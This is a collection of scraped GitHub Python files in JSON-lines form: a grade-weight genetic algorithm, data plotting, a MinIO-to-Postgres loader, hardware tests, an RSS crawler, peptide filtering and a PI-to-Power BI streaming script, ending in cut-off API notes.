dna.weights['assignment']) / 2\r\n new_quizzes_weight = (self.weights['quiz'] + dna.weights['quiz']) / 2\r\n new_project_weight = (self.weights['project'] + dna.weights['project']) / 2\r\n return DNA([new_assignment_weight, new_quizzes_weight, new_project_weight])\r\n\r\n def mutate(self):\r\n \"\"\"\r\n Mutate the DNA. Picks a random weight, modifies it by 10% (+ or -).\r\n Then, takes the difference of the new and old one and randomly modifies another weight\r\n (that is not the same) by -1 * the difference. If the constraints are not met,\r\n mutation is cancelled.\r\n :return: None\r\n \"\"\"\r\n # 5% chance of mutation\r\n if random.uniform(0, 1) <= DNA.mutation_rate:\r\n random_index, random_weight = get_random_weight()\r\n limits = tuple(map(lambda x: x/100, DNA.limits[random_weight]))\r\n old_val = self.weights[random_weight]\r\n new_val_upper = old_val * 1.1\r\n new_val_lower = old_val * 0.9\r\n new_val = -1\r\n if new_val_upper <= limits[1]:\r\n new_val = new_val_upper\r\n elif new_val_lower >= limits[0]:\r\n new_val = new_val_lower\r\n\r\n # Make sure new value is not -1\r\n if new_val != -1:\r\n self.weights[random_weight] = new_val\r\n if not self.randomly_modify(-(new_val-old_val), random_index):\r\n self.weights[random_weight] = old_val\r\n else:\r\n self.fitness = self.calculate_fitness()\r\n\r\n def randomly_modify(self, increment, constraint_index):\r\n \"\"\"\r\n Randomly modify a grade weight\r\n :param increment: the increment to modify by (can be negative)\r\n :param constraint_index: the index that shouldn't be modified\r\n :return: True if successful (i.e. within constraint), else False\r\n \"\"\"\r\n i, to_modify = get_random_weight()\r\n while i == constraint_index:\r\n i, to_modify = get_random_weight()\r\n limits = tuple(map(lambda x: x/100, DNA.limits[to_modify]))\r\n change = self.weights[to_modify] + increment\r\n if limits[0] <= change <= limits[1]:\r\n self.weights[to_modify] = change\r\n return True\r\n\r\n return False\r\n\r\n def __repr__(self):\r\n \"\"\"\r\n :return: the string format of the DNA object\r\n \"\"\"\r\n return \\\r\n f\"DNA ({self.weights['assignment']}, {self.weights['quiz']}, {self.weights['project']}), Fit: {self.fitness}\"\r\n\r\n\r\nclass Population:\r\n def __init__(self, pop_size, mutation_prob):\r\n \"\"\"\r\n Initialize a population with the given population size\r\n :param pop_size: the size of the population\r\n :param mutation_prob: the probability of mutation\r\n \"\"\"\r\n self.mutation_prob = mutation_prob\r\n self.pop = []\r\n self.create_first_generation(pop_size)\r\n self.best_dna = None\r\n self.generation = 1\r\n\r\n def create_first_generation(self, pop_size):\r\n \"\"\"\r\n Creates the initial generation by randomly generating\r\n grade weights.\r\n :param pop_size: the size of the population\r\n :return: None\r\n \"\"\"\r\n ranges = [DNA.limits['assignment'], DNA.limits['quiz'], DNA.limits['project']]\r\n cr = ConstrainedRandom(ranges, 100)\r\n for x in range(pop_size):\r\n reduced = list(map(lambda i: i/100, cr.next()))\r\n self.pop.append(DNA(reduced))\r\n\r\n def crossover(self):\r\n \"\"\"\r\n Crosses over all current DNA to create a new population with better (higher fitness) children\r\n :return: None\r\n \"\"\"\r\n # Create mating pool\r\n mating_pool = []\r\n best_dna = self.pop[0]\r\n if self.best_dna is None:\r\n self.best_dna = self.pop[0]\r\n print(self.pop)\r\n\r\n # Prep to create mating_pool\r\n fitness_values = []\r\n for x in range(len(self.pop)):\r\n fitness_values.append(self.pop[x].fitness)\r\n fitness_values = np.asarray(fitness_values).reshape(-1, 1)\r\n scaler = MinMaxScaler()\r\n scaled_fitness_values = list(scaler.fit_transform(fitness_values).flatten())\r\n\r\n for x in range(len(self.pop)):\r\n # record best DNA for generation\r\n if self.pop[x].fitness > best_dna.fitness:\r\n best_dna = self.pop[x]\r\n # record best DNA all time\r\n if self.pop[x].fitness > self.best_dna.fitness:\r\n self.best_dna = self.pop[x]\r\n # append based on fitness\r\n for i in range(int(float(scaled_fitness_values[x])*100)):\r\n mating_pool.append(self.pop[x])\r\n\r\n print(f'Best of ALL TIME: {self.best_dna}')\r\n print(f' Best DNA of generation {self.generation}: {best_dna}')\r\n # Create new population\r\n new_pop = []\r\n for x in range(len(self.pop)):\r\n parent_1 = random.choice(mating_pool)\r\n parent_2 = random.choice(mating_pool)\r\n # parent_1 = best_dna\r\n # parent_2 = random.choice(self.pop)\r\n child = parent_1.mate(parent_2)\r\n new_pop.append(child)\r\n\r\n self.pop = new_pop\r\n self.generation += 1\r\n\r\n def mutate(self):\r\n for x in range(len(self.pop)):\r\n self.pop[x].mutate()\r\n\r\n\r\n# Set grades\r\nDNA.assignment_grade = 73\r\nDNA.quizzes_grade = 64\r\nDNA.project_grade = 55\r\n\r\npopulation = Population(100, 0.05)\r\n\r\n# Keep running forever until user stops\r\nwhile True:\r\n population.crossover()\r\n population.mutate()\r\n","repo_name":"RaghavJH/Grade-optimizing-genetic-algorithm","sub_path":"gradeOptimizer.py","file_name":"gradeOptimizer.py","file_ext":"py","file_size_in_byte":7459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33719153852","text":"from argparse import ArgumentParser\nimport os\nfrom collections import defaultdict\nfrom pathlib import Path\nfrom matplotlib import pyplot as plt\nimport pickle as pkl\nimport json\n\nCACHE_DIR = \"cache\"\n\ndef main():\n os.makedirs(CACHE_DIR, exist_ok=True)\n\n parser = ArgumentParser()\n parser.add_argument(\"-ts\", \"--test_file\", type=Path, required=True, help=\"Path to test file\")\n parser.add_argument(\"-tr\", \"--train_file\", type=Path, required=True, help=\"Path to train file\")\n parser.add_argument(\"-f\", \"--force\", action=\"store_true\", help=\"Force overwrite cache\")\n parser.add_argument(\"-p\", \"--plot-dir\", type=Path, default=Path(\"plots\"), help=\"Path to plot directory\")\n args = parser.parse_args()\n\n if not args.test_file.exists():\n raise FileNotFoundError(f\"Test file not found: {args.test_file}\")\n\n if not args.train_file.exists():\n raise FileNotFoundError(f\"Train file not found: {args.train_file}\")\n\n cache_file_path = Path(CACHE_DIR) / f\"data-distribution.pkl\"\n\n if cache_file_path.exists() and not args.force:\n print(\"Loading from cache\")\n with open(cache_file_path, \"rb\") as f:\n data = pkl.load(f)\n else:\n max_depth = -1\n\n xd = [\n (args.train_file, defaultdict(int), \"Train\"),\n (args.test_file, defaultdict(int), \"Test\"),\n ]\n\n for file_path, depth_dict, name in xd:\n with file_path.open(\"r\") as f:\n for line in f:\n obj = json.loads(line)\n depth = obj[\"vertexDepth\"]\n max_depth = max(max_depth, depth)\n depth_dict[depth] += 1\n\n data = {}\n for file_path, depth_dict, name in xd:\n histogram = [0] * (max_depth + 1)\n for depth, count in depth_dict.items():\n histogram[depth] = count\n data[name] = histogram\n\n with cache_file_path.open(\"wb\") as f:\n pkl.dump(data, f)\n\n print(\"Plotting\")\n\n plt.rcParams.update({\n 'font.size': 18,\n })\n\n plt.xlabel(\"Depth\")\n plt.ylabel(\"Count\")\n plt.yscale(\"log\")\n\n for key in data:\n plt.plot(data[key], label=key)\n\n plt.legend(loc=\"upper right\")\n plt.tight_layout()\n plt.savefig(args.plot_dir / \"data-distribution.svg\")\n plt.clf()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Eggie-AI/repo","sub_path":"src/data-distribution.py","file_name":"data-distribution.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11931549900","text":"\"\"\"Module establishes connection with Minio service, takes csv files from 'newbucket'\nand creates tables inside Postgres database\"\"\"\nfrom os import environ\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom minio import Minio\n\n\ndef get_minio_client(host, access, secret):\n \"\"\"Gets Minio client\"\"\"\n\n return Minio(\n host,\n access_key=access,\n secret_key=secret,\n secure=False\n )\n\n\nif __name__ == '__main__':\n # Crete minio client\n minio_host = environ.get(\"MINIO_HOST\")\n minio_key = environ.get(\"MINIO_ACCESS_KEY\")\n minio_secret_key = environ.get(\"MINIO_SECRET_KEY\")\n minio_bucket = environ.get(\"MINIO_BUCKET\")\n minio_client = get_minio_client(minio_host, minio_key, minio_secret_key)\n\n # Establish connection to DB\n db_host = environ.get(\"PG_HOST\")\n user = environ.get(\"POSTGRES_USER\")\n password = environ.get(\"POSTGRES_PASSWORD\")\n db_name = environ.get(\"POSTGRES_DB\")\n conn_string = f'postgresql://{user}:{password}@{db_host}/{db_name}'\n db = create_engine(conn_string)\n conn = db.connect()\n\n # Create table\n objects = minio_client.list_objects(minio_bucket)\n table = pd.DataFrame({'date': [],\n 'state': [],\n 'region_code': [],\n 'region_denomination': [],\n 'province_code': [],\n 'province_denomination': [],\n 'province_abbreviation': [],\n 'lat': [],\n 'long': [],\n 'total_cases': [],\n 'Note': [],\n 'nuts_code_1': [],\n 'nuts_code_2': [],\n 'nuts_code_3': []})\n columns = table.columns.values.tolist()\n for obj in objects:\n minio_obj = minio_client.get_object(minio_bucket, obj.object_name)\n table_pd = pd.read_csv(minio_obj)\n table_pd.columns.values[:] = columns\n table = pd.concat([table, table_pd])\n table.to_sql('covid_ita', con=conn, if_exists='replace', index=False)\n","repo_name":"KirillRizhikov/python_education","sub_path":"DEintrotask/insert_table.py","file_name":"insert_table.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20374513016","text":"#!/usr/bin/env python3\r\n\r\n\r\ndef main():\r\n l = list()\r\n n = int(input())\r\n\r\n for i in range(n):\r\n tempList= []\r\n name, num, birth = input().split()\r\n num = int(num)\r\n tempList.append(name)\r\n tempList.append(num)\r\n tempList.append(birth)\r\n l.append(tempList)\r\n \r\n l = sorted(l, key = lambda x: x[1], reverse= True)\r\n\r\n\r\n print()\r\n print(l)\r\n\r\n \r\n for i in range(len(l)):\r\n print(i)\r\n curr = l[i][2]\r\n #print(\"CURR ------> {}\".format(curr))\r\n for j in range (len(l)-1):\r\n if i == j:\r\n continue\r\n #print(len(l))\r\n print(\"{} {}\".format(i, j))\r\n compare = l[j][2]\r\n #print(\" COMPARE ------> {}\".format(compare))\r\n if curr == compare:\r\n print(\"SAME DATE\")\r\n #print(\"{} {}\".format(l[i], l[j]))\r\n if l[i][1] > l[j][1]:\r\n l.remove(l[j])\r\n else:\r\n l.remove(l[i])\r\n \r\n print(\"NEW LIST: {}\".format(l))\r\n \r\n \r\n print(len(l))\r\n for i in l:\r\n print(i[0])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"tlittle2/Kattis-Solutions-Python","sub_path":"BirthdayMemorization/birthday.py","file_name":"birthday.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34332422674","text":"from cocotb_test.simulator import run, Icarus\nfrom cocotb_test import simulator\n\n\nclass IcarusAutoTimescale(Icarus):\n def compile_command(self):\n with open(self.sim_dir + \"/cmds.f\", \"w\") as f:\n f.write(\"+timescale+1ns/1ns\\n\")\n self.compile_args.extend([\"-f\", self.sim_dir + \"/cmds.f\"])\n return super().compile_command()\n\n\n# simulator.Icarus = IcarusAutoTimescale\n\ndef test_fen_decode():\n run(\n verilog_sources=[\n \"hw/fen_decode.sv\",\n \"hw/ascii_int_to_bin.sv\",\n \"hw/onehot_to_bin.v\",\n ],\n toplevel=\"fen_decode\",\n module=\"cocotb_fen_decode\",\n )\n\ndef test_psudo_legal_moves():\n run(\n verilog_sources=[\n \"hw/onehot_to_bin.v\",\n \"hw/onehot_from_bin.v\",\n \"hw/psudolegal_board.sv\",\n \"hw/movegen_square.sv\",\n \"hw/movegen_lookup_output.sv\",\n \"hw/movegen_rankfile.sv\",\n \"hw/movegen_piece_stack.sv\",\n \"hw/arbiter.v\",\n ],\n toplevel=\"psudolegal_board\",\n module=\"cocotb_psudolegal_board\",\n waves=True,\n )\n\n\n","repo_name":"shuckc/fpgachess","sub_path":"tests/test_hw.py","file_name":"test_hw.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42201366839","text":"from rss_feed_parser import RssFeedParser\nfrom multiprocessing import Pool\nfrom writers import MongoWriter\nimport time\n\ndef run(art):\n art.download_and_parse()\n return art\n\ndef write(args):\n art, host, port = args\n writer = MongoWriter(host, port)\n writer.write(art)\n return True\n\ndef main():\n start = time.time()\n f = RssFeedParser('http://rss.cnn.com/rss/cnn_topstories.rss')\n arts = f.get_new_articles()\n p = Pool(5)\n parsed = p.map(run, arts)\n print('fetched', len(arts), 'in ', time.time() - start, 'seconds')\n start = time.time()\n p.map(write, [(art, 'localhost', 27017) for art in parsed])\n print('wrote', len(arts), 'in ', time.time() - start, 'seconds')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gt-big-data/retina-crawler","sub_path":"test_multiprocessing.py","file_name":"test_multiprocessing.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"16362905400","text":"from imutils import face_utils\nimport dlib\nimport cv2\nimport os\nimport glob\n\n\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(os.path.join('data', 'shape_predictor_68_face_landmarks.dat'))\n\ncap = cv2.VideoCapture(0)\n\nmode = 'train'\n\n\nfiles = glob.glob(os.path.join('data', 'dataset', f'{mode}_imgs', '*.png'))\nname = int(files[-1].split('.')[-2].split('_')[-1])+1\n\nwhile True:\n ret, frame = cap.read()\n image = cv2.flip(frame, +1)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n rects = detector(gray, 1)\n\n leftXs = []\n leftYs = []\n rightXs = []\n rightYs = []\n\n for (i, rect) in enumerate(rects):\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n for x, y in shape[36:42]:\n leftXs.append(x)\n leftYs.append(y)\n for x, y in shape[42:48]:\n rightXs.append(x)\n rightYs.append(y)\n\n key = cv2.waitKey(1)\n if key == 27:\n break\n\n if leftXs.__len__() > 0:\n left = image[min(leftYs) - 5:max(leftYs) + 5, min(leftXs) - 5:max(leftXs) + 5]\n right = image[min(rightYs) - 5:max(rightYs) + 5, min(rightXs) - 5:max(rightXs) + 5]\n\n left = cv2.resize(left, (120, 60))\n right = cv2.resize(right, (120, 60))\n right = cv2.flip(right, +1)\n\n if key == 32:\n cv2.imwrite(os.path.join('data', 'dataset', f'{mode}_imgs', f'eye_{name}.png', left))\n cv2.imwrite(os.path.join('data', 'dataset', f'{mode}_imgs', f'eye_{name+1}.png', right))\n print(\"Take eyeshot!\")\n name += 2\n elif key == ord('q'):\n break\n\n cv2.imshow('All', image)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"bartoszptak/Gaze_Points_Dataset_Model","sub_path":"Cutter_eye.py","file_name":"Cutter_eye.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74252090704","text":"import os\nimport uuid\nfrom azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, __version__\n\n# Retrieve the connection string for use with the application. The storage\n# connection string is stored in an environment variable on the machine\n# running the application called AZURE_STORAGE_CONNECTION_STRING. If the environment variable is\n# created after the application is launched in a console or with Visual Studio,\n# the shell or application needs to be closed and reloaded to take the\n# environment variable into account.\nconnect_str = os.getenv('AZURE_STORAGE_CONNECTION_STRING')\n\n# Create the BlobServiceClient object which will be used to create a container client\nblob_service_client = BlobServiceClient.from_connection_string(connect_str)\n\n# path to blob to upload\ncwd = os.getcwd()\nblob_file = \"mc_1000_byte_cog.tif\"\nupload_file_path = os.path.join(cwd, blob_file)\n\n# Create a blob client using the local file name as the name for the blob\ncontainer_name = \"baselayer\"\nblob_client = blob_service_client.get_blob_client(container=container_name, blob=blob_file)\n\n# Upload the created file\nwith open(upload_file_path, \"rb\") as data:\n blob_client.upload_blob(data)\n\n","repo_name":"jmad1v07/natgeo-temp-webmap","sub_path":"cog/azureblob.py","file_name":"azureblob.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8217544906","text":"#!/usr/bin/python3.5\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport os\nimport sys\nfrom os.path import exists\nfrom os.path import join\nfrom os.path import dirname\nfrom os.path import abspath\n\n\nif __name__ == \"__main__\":\n base_path = dirname(dirname(abspath(__file__)))\n print(\"Project path: {0}\".format(base_path))\n env_path = join(base_path, \".tox\", \"bootstrap\")\n if sys.platform == \"win32\":\n bin_path = join(env_path, \"Scripts\")\n else:\n bin_path = join(env_path, \"bin\")\n if not exists(env_path):\n import subprocess\n print(\"Making bootstrap env in: {0} ...\".format(env_path))\n try:\n subprocess.check_call([\"virtualenv\", env_path, '--python=python3.5'])\n except Exception:\n subprocess.check_call([sys.executable, \"-m\", \"virtualenv\", env_path, '--python=python3.5'])\n print(\"Installing `jinja2` and `matrix` into bootstrap environment ...\")\n subprocess.check_call([join(bin_path, \"pip\"), \"install\", \"jinja2\", \"matrix\", \"pyyaml\"])\n activate = join(bin_path, \"activate_this.py\")\n exec(compile(open(activate, \"rb\").read(), activate, \"exec\"), dict(__file__=activate))\n\n import jinja2\n import matrix\n import yaml\n\n jinja = jinja2.Environment(\n loader=jinja2.FileSystemLoader(join(base_path, \"ci\", \"templates\")),\n trim_blocks=True,\n lstrip_blocks=True,\n keep_trailing_newline=True\n )\n tox_environments = {}\n for name in os.listdir(join(base_path, \"ci\", \"envs\")):\n os.unlink(join(base_path, \"ci\", \"envs\", name))\n\n for (alias, conf) in matrix.from_file(join(base_path, \"ci\", \"setup.cfg\")).items():\n tox_environments[alias] = conf\n conf['repo_name'] = 'python-nameless'\n conf['package_name'] = 'nameless'\n with open(join(base_path, \"ci\", \"envs\", alias + '.cookiecutterrc'), \"w\") as fh:\n fh.write(yaml.safe_dump(\n dict(default_context={k: v for k, v in conf.items() if v}),\n default_flow_style=False\n ))\n for name in os.listdir(join(base_path, \"ci\", \"templates\")):\n with open(join(base_path, name), \"w\") as fh:\n fh.write(jinja.get_template(name).render(tox_environments=tox_environments))\n print(\"Wrote {}\".format(name))\n print(\"DONE.\")\n","repo_name":"numengo/cc-py-setup","sub_path":"ci/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1121029072","text":"########################################################################################\n# Script to rank the peptides & compare them to known peptide files.\n# Made by Shane Pullens, Utrecht University - Theoretical bioinformatics.\n# Version 1.0\n########################################################################################\n\n# Imports\nimport pandas as pd\nfrom pathlib import Path\n\nproject_dir = Path.cwd()\n\n\ndef main():\n return None\n\n\ndef peptide_filtering(df, cutoff_percentage, absolute_cutoff=0, inclusive=True):\n \"\"\"\n This function will compare the found cryptic peptides to the canonical peptides, any overlap will result in removal\n of the cryptic peptide from the list, since it can also be a canonical peptide.\n :param df: Dataframe containing obtained peptides:\n :param: cutoff_percentage: cutoff for top x percentage of the peptides.\n :param: absolute_cutoff: when not null, absolute number of peptides is used instead of percentage.\n :param mode: definition of cryptic or canonical mode, known peptides lists will be used accordingly.\n :return: 3 lists of peptides; 1: list of wrongly classified peptides, 2: list of known peptides, 3: list of newly, not classified peptides.\n \"\"\"\n top_df = pd.DataFrame()\n percentage_mode = True\n df = df.sort_values(by=['%Rank_EL'])\n\n # When an absolute cutoff has been selected, it will overrule the percentage cutoff.\n if absolute_cutoff != 0:\n percentage_mode = False\n\n # Save top x% of the best ranking peptides\n if percentage_mode:\n print('Using percentage cutoff')\n cutoff_quantile = cutoff_percentage / 100\n df_cutoff = df['%Rank_EL'].quantile(cutoff_quantile)\n df_mask = df['%Rank_EL'] <= df_cutoff\n top_df = df[df_mask]\n\n # Save top x number of best ranking peptides.\n elif not percentage_mode:\n print('Using absolute cutoff')\n top_df = df[:absolute_cutoff]\n\n # Inclusive mode checks if there are peptides that fall out of scope due to the threshold, but have the same rank.\n # When the same rank is detected, they are still added to the candidate list, overruling the threshold.\n if inclusive:\n print('Inclusive mode enabled, adding all peptides with same EL rank as peptides in selected scope...')\n same_rank = top_df['%Rank_EL'].max()\n top_df = df[df['%Rank_EL'] <= same_rank]\n return top_df\n\n\ndef peptide_comparison(df, hla, mode='cryp'):\n \"\"\"\n This method compares our candidate peptides with known peptides from our database.\n If they are found, they are moved from the candidate list to the false positive list.\n :param df: list of candidate peptides\n :param hla: HLA molecule to compare to\n :param mode: Either \"cryp\" or \"can\", internal flag to select cryptic or canonical peptide database.\n :return df: filtered candidate peptide list with solely unknown peptides\n :return confirmed_canonical: peptide list of peptides that have been found in other literature.\n \"\"\"\n text = ''\n if mode == 'can':\n text = 'Canonical'\n elif mode == 'cryp':\n text = 'Cryptic'\n\n print(f'Comparing {hla} peptides with known, {text} peptide database...')\n global project_dir\n comparison_df = pd.DataFrame()\n confirmed_canonical = pd.DataFrame()\n if hla == 'HLA-A01':\n if mode == 'cryp':\n comparison_df = pd.read_csv(Path(project_dir / 'Data' / 'Known_peptides' / 'HLA-A01_cryptic.csv'))\n elif mode == 'can':\n comparison_df = pd.read_csv(Path(project_dir / 'Data' / 'Known_peptides' / 'HLA-A01_canonical.csv'))\n elif hla == 'HLA-A02':\n if mode == 'cryp':\n comparison_df = pd.read_csv(Path(project_dir / 'Data' / 'Known_peptides' / 'HLA-A02_cryptic.csv'))\n elif mode == 'can':\n comparison_df = pd.read_csv(Path(project_dir / 'Data' / 'Known_peptides' / 'HLA-A02_canonical.csv'))\n\n try:\n merged_df = pd.merge(df, comparison_df, on=['Peptide'], how='inner')\n print('Canonical peptides have been detected! Removing from list...')\n confirmed_canonical = df[df['Peptide'].isin(merged_df['Peptide'])]\n print(confirmed_canonical.shape)\n best_ranking_peptides = df[~df['Peptide'].isin(merged_df['Peptide'])] # Removed all known canonical peptides\n df = best_ranking_peptides\n except:\n print('No known peptides have been found, saving peptides...')\n\n return df, confirmed_canonical\n\nif __name__ == \"__main__\":\n main()","repo_name":"Sjonnie404/NeoPipeline","sub_path":"Scripts/Peptide_selection.py","file_name":"Peptide_selection.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3935694368","text":"import json\r\nimport requests\r\nimport sys\r\nimport os\r\nsys.path.append('C:\\\\Program Files (x86)\\\\PIPC\\\\AF\\\\PublicAssemblies\\\\4.0\\\\')\r\nimport clr\r\nclr.AddReference('OSIsoft.AFSDK')\r\nimport time\r\nimport datetime\r\nfrom datetime import datetime\r\nimport psutil\r\nimport pytz\r\nimport schedule\r\n\r\nfrom OSIsoft.AF.PI import *\r\nfrom OSIsoft.AF.Search import *\r\nfrom OSIsoft.AF.Asset import *\r\nfrom OSIsoft.AF.Data import *\r\nfrom OSIsoft.AF.Time import *\r\nfrom System.Net import NetworkCredential # by default by window\r\n\r\ntbeServerIp = \"xxx.xx.xx.xx\"\r\ntbeServerName = \"XXX\"\r\ntbeServerUser = \"pidemo\" #pidemo only\r\n\r\ntbpServerIp = \"xxx.xx.xx.xx\"\r\ntbpServerName = \"XXX\"\r\ntbpServerUser = \"pidemo\" #pidemo and piuser\r\n\r\npppServerIp = \"xxx.xx.xx.xx\"\r\npppServerName = \"XXX\"\r\npppServerUser = \"pidemo\" #pidemo only\r\n\r\nsevServerIp = \"xxx.xx.xx.xx\"\r\nsevServerName = \"XXX\"\r\nsevServerUser = \"piuser\" #pidemo and piuser\r\n\r\ndef connect_to_Server(serverName, serverUser):\r\n try:\r\n piServers = PIServers()\r\n global piServer\r\n piServer = piServers[serverName]\r\n # print(piServer)\r\n serverCred = NetworkCredential(serverUser, None)\r\n connection = piServer.Connect(serverCred)\r\n # print(piServer.ConnectionInfo.IsConnected)\r\n except Exception as e:\r\n print(e)\r\n return\r\n\r\ndef get_tag_lastvalue(tagname):\r\n try:\r\n tag = PIPoint.FindPIPoint(piServer, tagname)\r\n\r\n # last value \r\n # like a CurrentValue() there are many more methods available on internet you can find\r\n #print(\"tagvalue\",tag)\r\n\r\n last_value = tag.CurrentValue()\r\n #print(\"last_value\",last_value)\r\n\r\n if type(last_value.Value) == float or type(last_value.Value) == int:\r\n previous_data = last_value.Value\r\n print(\"store previous data =\", previous_data)\r\n return last_value.Value\r\n else:\r\n # return last_value.Value.Value\r\n print(\"display previous data\")\r\n return previous_data\r\n\r\n except Exception as e:\r\n print(tagname, \" --> \", e)\r\n return\r\n\r\ndef collect_data():\r\n \r\n connect_to_Server(tbeServerIp, tbeServerUser)\r\n tbe_tag = \"XXXXXXX\"\r\n tbe_value = get_tag_lastvalue(tbe_tag)\r\n\r\n connect_to_Server(pppServerIp, pppServerUser)\r\n ppp_tag = \"XXXXXXX\"\r\n ppp_value = get_tag_lastvalue(ppp_tag)\r\n \r\n connect_to_Server(tbpServerIp, tbpServerUser)\r\n tbp_tag10 = \"XXXXXXX\"\r\n tbp_tag20 = \"XXXXXXX\"\r\n tbp_tag30 = \"XXXXXXX\"\r\n tbp_value10 = get_tag_lastvalue(tbp_tag10)\r\n tbp_value20 = get_tag_lastvalue(tbp_tag20)\r\n tbp_value30 = get_tag_lastvalue(tbp_tag30)\r\n\r\n connect_to_Server(sevServerIp, sevServerUser)\r\n sev_tag1 = \"XXXXXXX\"\r\n sev_tag2 = \"XXXXXXX\"\r\n sev_value1 = get_tag_lastvalue(sev_tag1)\r\n sev_value2 = get_tag_lastvalue(sev_tag2)\r\n\r\n #Total Generation \r\n\r\n plantName = [\"XXX\", \"XXX\", \"XXX\", \"XXX\"]\r\n cityName = [\"XXX\", \"XXX\", \"XXX\", \"XXX\"]\r\n latitude = [XXXX, XXXX, XXXX, XXXX]\r\n longitude = [XXXX, XXXX, XXXX, XXXX]\r\n powerGeneration1 = [tbe_value, tbp_value10, ppp_value, sev_value1]\r\n powerGeneration2 = [0, tbp_value20, 0, sev_value2]\r\n powerGeneration3 = [0, tbp_value30, 0, 0]\r\n \r\n json_data = []\r\n for i in range(len(plantName)):\r\n entry = {\r\n 'timestamp': now,\r\n 'plantName': plantName[i],\r\n 'city': cityName[i],\r\n 'latitude': latitude[i],\r\n 'longitude': longitude[i],\r\n 'powerGeneration1': powerGeneration1[i],\r\n 'powerGeneration2': powerGeneration2[i],\r\n 'powerGeneration3': powerGeneration3[i],\r\n }\r\n json_data.append(entry)\r\n\r\n json_data1 = [{\r\n 'timestamp': now,\r\n 'tbe_value': tbe_value,\r\n 'ppp_value': ppp_value,\r\n 'tbp_value10': tbp_value10,\r\n 'tbp_value20': tbp_value20,\r\n 'tbp_value30': tbp_value30,\r\n 'sev_value1': sev_value1,\r\n 'sev_value2': sev_value2,\r\n 'totalGeneration': tbe_value + ppp_value + tbp_value10 + tbp_value20 + tbp_value30 + sev_value1 + sev_value2,\r\n 'totalTBP': tbp_value10 + tbp_value20 + tbp_value30,\r\n 'totalSEV': sev_value1 + sev_value2,\r\n 'tbe_cf': (tbe_value/(1000*24))*100,\r\n 'ppp_cf': (ppp_value/(341.17*24))*100,\r\n 'tbp_cf': ((tbp_value10 + tbp_value20 + tbp_value30)/(2100*24))*100,\r\n 'sev_cf': ((sev_value1 + sev_value2)/(1303*24))*100\r\n }]\r\n \r\n return json_data1\r\n\r\ndef record_data():\r\n data = collect_data()\r\n with open('lgd_daily_data.json', 'a') as file:\r\n json.dump(data, file)\r\n file.write('\\n')\r\n\r\nschedule.every(15).minutes.at(\":00\").do(record_data)\r\n\r\nwhile True:\r\n try:\r\n start_time = time.time()\r\n now = datetime.strftime(datetime.now(), \"%Y-%m-%dT%H:%M:%S%Z\")\r\n res = requests.post('powerBI API', data=json.dumps(json_data))\r\n print(res.status_code)\r\n # res1 = requests.post('powerBI API', data=json.dumps(json_data1))\r\n # print(res1.status_code)\r\n # print(json_data)\r\n # print(json_data1)\r\n print(collect_data())\r\n schedule.run_pending()\r\n \r\n #time.sleep(5)\r\n sleep_time = time.time() - start_time\r\n print(\"time taken in seconds \", int(sleep_time))\r\n print(\"------------------------------------------------------------------------\")\r\n if sleep_time < 30:\r\n time.sleep(30 - int(sleep_time))\r\n\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n continue\r\n","repo_name":"mosyaso/Data_Engineer_Project","sub_path":"ETL_Pipeline/Stream_Data_From_PI_to_PowerBI.py","file_name":"Stream_Data_From_PI_to_PowerBI.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15671185355","text":"# Напишите программу, которая принимает на вход координаты двух точек и находит расстояние между ними в 2D пространстве.\n# Пример:\n# A (3,6); B (2,1) -> 5,09\n# A (7,-5); B (1,-1) -> 7,21\n\n\n# Ускоренная обработка данных: lambda, filter, map, zip, enumerate, list comprehension.\n\nimport math\n\nfirst = [int(input('Введите координаты точки А: ')) for _ in range(2) ]\nsecond = [int(input('Введите координаты точки B: ')) for _ in range(2) ]\n\nres = round(sum([(elem[1] - elem[0])**2 for elem in zip(first, second)])**0.5 , 2)\nprint(f'Расстояние между точками А и В равно => {res}')\n","repo_name":"Jucharick/HW_python","sub_path":"Task_035.py","file_name":"Task_035.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34148615122","text":"# API - application programming interface\n\n# - is a set of commands, functions, protocols and objects that programmers can use to create software of interact with an external system\n# - a barrier between my program and an external system\n# - trying to use the rules that the API prescribed to make the request to the external system\n# - if the request is accoring the the rules from the API then the external system will send back a response with the data that you want\n\n# endpoint - the location that can be accessed to get the 